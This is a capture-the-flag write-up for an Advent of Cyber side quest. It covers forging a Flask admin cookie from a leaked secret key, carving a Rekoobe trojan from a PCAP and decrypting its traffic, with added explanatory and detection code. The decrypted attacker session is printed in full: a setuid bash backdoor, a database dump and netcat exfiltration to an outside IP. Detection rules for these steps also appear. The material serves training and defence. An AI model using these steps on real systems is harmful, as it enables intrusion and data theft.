Challenge background: "By the time you read this, you've already been attacked. I'm in your machine and you won't get it back. You must be aware that the more you delay, the more information will be stolen away. Your SOC is so weak, I'll lend them a hand. Here's a PCAP of the attack, you can't beat this band! If your machine you want to recover, the password I stole you'll need to discover."
The first of our enemies is the Frostbite Fox, known for being the slyest of them all. She's made her way into McSkidy's machine. Luckily for us, our great SOC detected it all in time. While the team focuses on securing the machine, you are tasked with recovering the password the Fox stole, so we can get McSkidy's data back.
Note: To attempt this challenge you will need to find the L1 Keycard in the main Advent of Cyber room challenges. The password in the keycard will allow you to open the ZIP file, which you can download from http://MACHINE_IP/aoc_sq_1.zip. The zip file is safe to download, with MD5 044a78a6a1573c562bc18cefb761a578. In general, as a security practice, download the zip and analyze the forensic files on a dedicated virtual machine, not on your host OS. The keycard will be hidden between days 1 and 4.
The challenge starts with a zip archive. After downloading it we need its password, and the hint tells us that the password is only obtainable through a key hidden in the main room. Only once we have that key can we extract the archive, so the first task is to find the key.
L1 keycard. While working through the tasks in the main room we came across the following hint:
It tells us to look at the GitHub repository for more information. While doing the main-line tasks we had already found a repository:
from flask import Flask, render_template, request, redirect, url_for, session

app = Flask(__name__)
app.secret_key = "@09JKD0934jd712?djD"  # session-signing key, hard-coded and committed

ADMIN_USERNAME = "admin"
ADMIN_PASSWORD = "securepassword"


@app.route("/")
def home():
    if "logged_in" in session:
        return redirect(url_for("dashboard"))
    return redirect(url_for("login"))


@app.route("/login", methods=["GET", "POST"])
def login():
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]
        if username == ADMIN_USERNAME and password == ADMIN_PASSWORD:
            session["logged_in"] = True
            session["username"] = username
            return redirect(url_for("dashboard"))
        else:
            return render_template("login.html", error="Invalid credentials!")
    return render_template("login.html")


@app.route("/dashboard")
def dashboard():
    if "logged_in" not in session:
        return redirect(url_for("login"))
    return render_template("dashboard.html")


@app.route("/data")
def data():
    if "logged_in" not in session:
        return redirect(url_for("login"))
    return render_template("data.html")


@app.route("/logout")
def logout():
    session.pop("logged_in", None)
    session.pop("username", None)
    return redirect(url_for("login"))


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8000)
The repository contains an app.py with the account and password written into it. Our first thought was to open the page and try logging in with those credentials, but the original credentials had been changed. Since the secret_key is also in the source, we can instead run the same app locally, obtain a cookie for an admin session from it, and present that cookie to the target to log in as the administrator, as shown below.
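Why the cookie step above works, and what actually closes the hole, as an added example (not code from the write-up or from the repository): a Flask session cookie is signed, not encrypted, so anyone holding the committed secret_key can mint a cookie that claims logged_in = True, and the only real fix is to rotate the key and keep it out of source control. The block uses a simplified HMAC-SHA256 scheme in the same payload.signature shape rather than Flask's real itsdangerous format; LEAKED_SECRET_KEY is the value from app.py, and FLASK_SECRET_KEY is an assumed environment variable name.

```python
import base64
import hashlib
import hmac
import json
import os
import secrets
from typing import Optional

# The hard-coded value from the leaked app.py. Once it is public, every session
# cookie signed with it can be produced by anyone who read the repository.
LEAKED_SECRET_KEY = "@09JKD0934jd712?djD"


def _b64e(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_session(claims: dict, secret_key: str) -> str:
    """Serialise the claims and append an HMAC-SHA256 tag keyed with secret_key.
    Simplified stand-in for Flask's cookie: same shape (payload.signature) and the
    same property, signed but not encrypted."""
    payload = _b64e(json.dumps(claims, sort_keys=True, separators=(",", ":")).encode())
    tag = hmac.new(secret_key.encode(), payload.encode(), hashlib.sha256).digest()
    return f"{payload}.{_b64e(tag)}"


def read_claims_without_key(cookie: str) -> dict:
    """The payload is only base64: whoever holds the cookie can read it without the key."""
    payload, _, _ = cookie.rpartition(".")
    return json.loads(_b64d(payload))


def verify_session(cookie: str, secret_key: str) -> Optional[dict]:
    """Return the claims if the tag is valid under secret_key, otherwise None."""
    payload, _, tag = cookie.rpartition(".")
    expected = hmac.new(secret_key.encode(), payload.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(_b64e(expected), tag):
        return None
    return json.loads(_b64d(payload))


def load_secret_key(env=os.environ) -> str:
    """Hardened form: the key comes from the environment (assumed variable name),
    never from the source tree, and a short or missing key refuses to start."""
    key = env.get("FLASK_SECRET_KEY", "")
    if len(key) < 32:
        raise RuntimeError("FLASK_SECRET_KEY missing or shorter than 32 characters")
    return key


if __name__ == "__main__":
    # What the write-up's step relies on: a cookie minted with the key from the repo
    # is accepted as a logged-in admin by any server still using that key.
    cookie = sign_session({"logged_in": True, "username": "admin"}, LEAKED_SECRET_KEY)
    print("readable without key:", read_claims_without_key(cookie))
    print("accepted under leaked key:", verify_session(cookie, LEAKED_SECRET_KEY))
    # Rotating the key is what invalidates it: the same cookie is now rejected.
    rotated = secrets.token_urlsafe(32)
    print("accepted after rotation:", verify_session(cookie, rotated))
```

Changing the admin password, as the challenge's defenders did, does not help here: the cookie never carries the password, only a claim that login already happened, so every session minted under the old key stays valid until the key itself is rotated.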
We then open the data page and see the following:
We have found our L1 keycard.
That string is the password for the zip archive. Extracting the archive with it gives us a packet capture, and the rest of the challenge is traffic analysis.
Q1. We need the password the hacker used to register. Registration is submitted with a POST request, so we look for POST requests by entering http.request.method == "POST" in the display filter.
That quickly locates the packet; right-click it and follow the stream.
Here we find the password.
Q2. The second question asks for the password the attacker obtained. Having obtained the administrator's password, the attacker must have logged in with it, so we only need to look at the login request, shown below:
The attacker logs in as the administrator, so this password must be the stolen administrator password. Again, right-click and follow the stream.
So the answer to this question is:
Q3. What is the password of the zip file transferred by the attacker?
Questions 3 and 4 are a big step up in difficulty. We start by continuing through the HTTP traffic.
We can see that after logging in as the administrator, the attacker downloaded something from a remote server, as shown below:
We focus on this ff file; right-click it and follow the stream:
We find that an executable was fetched, an ELF file. Let's export it: export the whole stream as raw data to an .elf file, then strip the HTTP headers in front of the binary, which gives us download.elf.
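The two stream-reading steps above (pulling the submitted credentials out of form POSTs in Q1 and Q2, and carving the ELF out of the HTTP response in Q3) in script form, as an added example that is not part of the write-up or of any tool it uses. The sample requests, the stand-in ELF body and the host address are constructed for the demonstration; only the page names /register.php and /index.php are taken from the directory listing later in the write-up.

```python
"""Pull form credentials and a transferred binary out of raw HTTP streams."""
import hashlib
from urllib.parse import parse_qs

ELF_MAGIC = b"\x7fELF"
# Field names treated as secrets when reporting a credential submission.
PASSWORD_KEYS = {"password", "passwd", "pass", "pwd", "confirm_password"}


def parse_http_message(raw: bytes):
    """Split one HTTP/1.1 request or response into (start_line, headers, body).
    The body is cut at Content-Length when present, since a raw stream export
    carries the headers directly in front of the payload."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP headers")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", len(rest)))
    return lines[0], headers, rest[:length]


def credential_posts(messages):
    """Q1/Q2 step: (path, fields) for every form POST that carries a password-like
    field. Secret values are redacted so the report can be shared."""
    hits = []
    for raw in messages:
        start_line, headers, body = parse_http_message(raw)
        method, path, _ = start_line.split(" ", 2)
        if method != "POST" or "x-www-form-urlencoded" not in headers.get("content-type", ""):
            continue
        fields = {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}
        if fields.keys() & PASSWORD_KEYS:
            hits.append((path, {k: "<redacted>" if k in PASSWORD_KEYS else v
                               for k, v in fields.items()}))
    return hits


def carve_body(raw_response: bytes):
    """Q3 step: strip the HTTP headers from a response and return
    (body, looks_like_elf, md5) so the file can be saved and looked up."""
    _, _, body = parse_http_message(raw_response)
    return body, body.startswith(ELF_MAGIC), hashlib.md5(body).hexdigest()


def printable_strings(data: bytes, min_len: int = 8):
    """First-pass triage of a carved binary: runs of printable ASCII, the same
    idea as the strings(1) utility."""
    found, run = [], bytearray()
    for byte in data:
        if 32 <= byte < 127:
            run.append(byte)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


# ---- constructed sample traffic (not from the challenge capture) ----
def _form_post(path: str, body: str) -> bytes:
    return (f"POST {path} HTTP/1.1\r\nHost: 10.10.10.10\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode() + body.encode()


SAMPLE_REQUESTS = [
    _form_post("/register.php", "username=frostbite_fox&password=example-pw-1&confirm_password=example-pw-1"),
    _form_post("/index.php", "username=mcskidy&password=example-pw-2"),
    b"GET /ff HTTP/1.1\r\nHost: 10.10.10.10\r\n\r\n",
]

# Stand-in for the downloaded ELF: correct magic and one embedded string, no real code.
FAKE_ELF = (b"\x7fELF\x02\x01\x01" + bytes(9) + b"\x02\x00\x3e\x00" + bytes(32)
            + b"demo_embedded_key_string\x00" + bytes(8))
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
                   + f"Content-Length: {len(FAKE_ELF)}\r\n\r\n".encode() + FAKE_ELF)

if __name__ == "__main__":
    for path, fields in credential_posts(SAMPLE_REQUESTS):
        print("credential POST to", path, fields)
    body, is_elf, digest = carve_body(SAMPLE_RESPONSE)
    print("carved", len(body), "bytes; ELF:", is_elf, "; md5:", digest)
    print("strings:", printable_strings(body))
```

Cutting the body at Content-Length rather than taking everything after the blank line matters when several responses share one TCP stream; otherwise the carved file picks up the next response's headers and its hash no longer matches anything in a threat-intel lookup.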
We first submit it to ThreatBook (微步) for a scan.
It turns out to be a Rekoobe trojan. From the research we learn that this trojan executes commands over SSH, and a decryption script can be found online:
https://github.com/alexander-utkov/rekobee-analyzer
Download it and use it to decrypt the traffic.
We find that it also needs a -s key parameter, which we can recover by reverse-engineering the ELF file, as shown below:
In the main function we find the key, SuP3RSeCrEt. Now we can decrypt. Since the attacker's activity happened after the ff file was fetched, we only need to decrypt the traffic from that point on; otherwise the capture is too large and the script takes very long to produce a result. So we first export that portion.
We export only the traffic after that point.
Then we run the script directly:
python analyze.py -c out.pcapng -s SuP3RSeCrEt -vv
While running it we hit the following error:
The problem is in pyshark; patching pyshark fixes it.
After several rounds of debugging it finally ran through, as shown below:
root@database:/tmp# cp /bin/bash /bin/pkexeccc
root@database:/tmp# chmod u+s /bin/pkexeccc
root@database:/tmp# md5sum /bin/pkexeccc
7063c3930affe123baecd3b340f1ad2c /bin/pkexeccc
root@database:/tmp# md5sum /bin/bash
7063c3930affe123baecd3b340f1ad2c /bin/bash
root@database:/tmp# ls -l /bin/pkexeccc
-rwsr-xr-x 1 root root 1183448 Nov 13 00:06 /bin/pkexeccc
root@database:/tmp# ls -la /var/www/html/
total 652
drwxr-xr-x 3 root root 4096 Nov 12 23:24 .
drwxr-xr-x 3 root root 4096 Mar 15 2022 ..
drwxr-x--x 2 root root 4096 Nov 12 23:28 admin
-rw-r--r-- 1 root root 609097 Nov 12 23:15 bg.png
-rw-r--r-- 1 root root 494 Nov 12 22:47 config.php
-rw-r--r-- 1 root root 5479 Nov 12 23:19 index.php
-rw-r--r-- 1 root root 223 Mar 15 2022 logout.php
-rw-r--r-- 1 root root 5338 Nov 12 23:21 register.php
-rw-r--r-- 1 root root 4191 Nov 12 23:24 reset-password.php
-rw-r--r-- 1 root root 8644 Nov 12 23:24 welcome.php
root@database:/tmp# cat /var/www/html/config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'mcskidy');
define('DB_PASSWORD', 'aBT4ZfhteNRE3ah');
define('DB_NAME', 'website');

/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($mysqli === false){
die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>

root@database:/tmp# mysql -h localhost -u mcskidy -p'aBT4ZfhteNRE3ah' -e 'show databases;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------------+
| Database |
+--------------------+
| elves |
| information_schema |
| website |
+--------------------+
root@database:/tmp# mysql -h localhost -D elves -u mcskidy -p'aBT4ZfhteNRE3ah' -e 'show tables;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+-----------------+
| Tables_in_elves |
+-----------------+
| elf |
+-----------------+
root@database:/tmp# mysqldump -u mcskidy -p'aBT4ZfhteNRE3ah' elves elf > elves.sql
mysqldump: [Warning] Using a password on the command line interface can be insecure.
root@database:/tmp# zip -P 9jYW5fRW5jcnlwVF9iVXR elves.zip elves.sql
adding: elves.sql (deflated 58%)
root@database:/tmp# nc -w 3 10.13.44.207 9002 < elves.zip
root@database:/tmp# echo 'GG EZ McSkidy' > /home/mcskidy/haha.txt
root@database:/tmp# [info] Done.
Reading carefully, we find a zip command; the value passed to its -P option is the password we are looking for.
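The decrypted session above is a compact example of what a SOC would want to alert on, so here is a rule-based triage of it, added as an example that is not part of the write-up or of the analyzer script. It strips the prompt from each line, tags the commands by stage (a shell copied into /bin and given the setuid bit, the application config read, the database dumped, packed with a password, and pushed out with nc), and summarises which stages appeared. The rule set and stage names are my own; the sample lines are the transcript's commands with the passwords replaced by a placeholder.

```python
"""Rule-based triage of a recovered shell session."""
import re

# Shell prompt of the form user@host:dir# or user@host:dir$
PROMPT = re.compile(r"^\S+@\S+:\S+[#$]\s*")

# (rule id, pattern, "stage: description"). Stage names are this example's own.
RULES = [
    ("shell_copy", re.compile(r"\bcp\s+/bin/(ba)?sh\s+/(usr/)?s?bin/"),
     "persistence: a copy of a shell placed in a system bin directory"),
    ("suid_set", re.compile(r"\bchmod\s+(u\+s|\+s|[2467][0-7]{3})\b"),
     "persistence: setuid/setgid bit added to a file"),
    ("config_read", re.compile(r"\bcat\b.*(config\.php|wp-config\.php|\.env)(\s|$)"),
     "credential access: application config file read"),
    ("cli_password", re.compile(r"\s-p'[^']+'|\s-p\S+"),
     "credential exposure: database password given on the command line"),
    ("db_dump", re.compile(r"\bmysqldump\b"),
     "collection: database dump"),
    ("zip_pw", re.compile(r"\bzip\s+.*-P\s+\S+"),
     "collection: password-protected archive created"),
    ("nc_out", re.compile(r"\bnc\b.*\b\d{1,3}(\.\d{1,3}){3}\s+\d+.*<"),
     "exfiltration: netcat sending a local file to a remote host"),
]


def command_of(line: str) -> str:
    """Drop the shell prompt so the rules only see what was typed."""
    return PROMPT.sub("", line).strip()


def classify(line: str):
    """Return (command, [rule ids]) for one line; an empty list means nothing matched."""
    cmd = command_of(line)
    return cmd, [rule_id for rule_id, pat, _ in RULES if pat.search(cmd)]


def triage(lines):
    """Keep only the lines that fired a rule, as {command: [rule ids]} in session order."""
    report = {}
    for line in lines:
        cmd, hits = classify(line)
        if hits:
            report[cmd] = hits
    return report


def stages_seen(report):
    """Stages in order of first appearance: a one-line kill-chain summary of the session."""
    stage_of = {rule_id: text.split(":")[0] for rule_id, _, text in RULES}
    seen = []
    for hits in report.values():
        for rule_id in hits:
            if stage_of[rule_id] not in seen:
                seen.append(stage_of[rule_id])
    return seen


# Commands from the decrypted session above; passwords replaced by <redacted>.
SESSION_LINES = [
    "root@database:/tmp# cp /bin/bash /bin/pkexeccc",
    "root@database:/tmp# chmod u+s /bin/pkexeccc",
    "root@database:/tmp# md5sum /bin/pkexeccc",
    "root@database:/tmp# ls -la /var/www/html/",
    "root@database:/tmp# cat /var/www/html/config.php",
    "root@database:/tmp# mysql -h localhost -u mcskidy -p'<redacted>' -e 'show databases;'",
    "root@database:/tmp# mysqldump -u mcskidy -p'<redacted>' elves elf > elves.sql",
    "root@database:/tmp# zip -P <redacted> elves.zip elves.sql",
    "root@database:/tmp# nc -w 3 10.13.44.207 9002 < elves.zip",
    "root@database:/tmp# echo 'GG EZ McSkidy' > /home/mcskidy/haha.txt",
]

if __name__ == "__main__":
    report = triage(SESSION_LINES)
    for cmd, hits in report.items():
        print(f"{', '.join(hits):24s} {cmd}")
    print("stages:", " -> ".join(stages_seen(report)))
```

The setuid copy is the part worth catching early: a SUID file whose hash equals /bin/bash (the md5sum pair in the transcript) survives the password reset and the web-shell cleanup, and a periodic `find / -perm -4000` diff or a file-integrity monitor on /bin is what surfaces it.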
Q4. What is McSkidy's password that was inside the database file stolen by the attacker?
We extract the zip archive with that password and open it to see the following:
Opening the file reveals the password:
faXRfSXNfTjB0X0YwMGxwcm8wZn0=
A very cleverly designed challenge, well worth studying and reflecting on.